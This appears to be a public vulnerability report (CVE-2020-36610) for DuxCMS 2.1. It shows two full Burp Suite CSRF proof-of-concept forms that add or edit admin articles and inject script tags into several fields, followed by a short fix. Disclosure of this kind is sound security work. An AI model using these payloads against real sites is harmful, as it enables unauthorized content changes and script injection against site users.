Headline
CVE-2020-36610: Add article has CSRF and XSS · Issue #I183GG · 王爷/DuxCMS2.1支持php7.0以上版本 - Gitee.com
A vulnerability was found in annyshow DuxCMS 2.1. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215116.
Add/Edit article
login in the system,and add article like this.
The captured data packet has an xss vulnerability in the content parameter.
edit article test
Generate CSRF payload using Burpsuite plugin.
copy that and edit like this.This is a edit article payload
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/edit" method="POST">
<input type="hidden" name="class_id" value="2" />
<input type="hidden" name="title" value="test333333" />
<input type="hidden" name="image" value="" />
<input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="get_image" value="1" />
<input type="hidden" name="get_image_num" value="1" />
<input type="hidden" name="get_description" value="1" />
<input type="hidden" name="description" value="sfdadsfadfa" />
<input type="hidden" name="keywords" value="sfdadsfadfa" />
<input type="hidden" name="taglink" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="font_color" value="0" />
<input type="hidden" name="urltitle" value="test2" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="time" value="2020&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="copyfrom" value="sds&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="views" value="6" />
<input type="hidden" name="sequence" value="0" />
<input type="hidden" name="tpl" value="" />
<input type="hidden" name="content_id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
if you want to edit “test111111”
run this payload like this and it will edit successfully this article content.
access this article and it will alert something like this.
Add article test****CSRF and XSS Payload
this payload is use add article and input evil javascript in “content” parameter.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add" method="POST">
<input type="hidden" name="class_id" value="1" />
<input type="hidden" name="title" value="aaaaaaaaaaaaaaaaaaaaa" />
<input type="hidden" name="image" value="" />
<input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="get_image" value="1" />
<input type="hidden" name="get_image_num" value="1" />
<input type="hidden" name="get_description" value="1" />
<input type="hidden" name="description" value="adfads" />
<input type="hidden" name="keywords" value="adfa" />
<input type="hidden" name="taglink" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="font_color" value="0" />
<input type="hidden" name="urltitle" value="" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="time" value="2020/01/08 15:49" />
<input type="hidden" name="copyfrom" value="本站" />
<input type="hidden" name="views" value="0" />
<input type="hidden" name="sequence" value="0" />
<input type="hidden" name="tpl" value="" />
<input type="hidden" name="content_id" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
run this payload.
and you can see add one article “aaaaaaaaaaaaaaaaa”
access it and it will successfully run some evil javascript like this.
Csrf and xss vulnerabilities are caused because tokens are not set for functions and sensitive characters are filtered.
Solution
1)Set token for this function.
2)Filtering sensitive characters for any input data.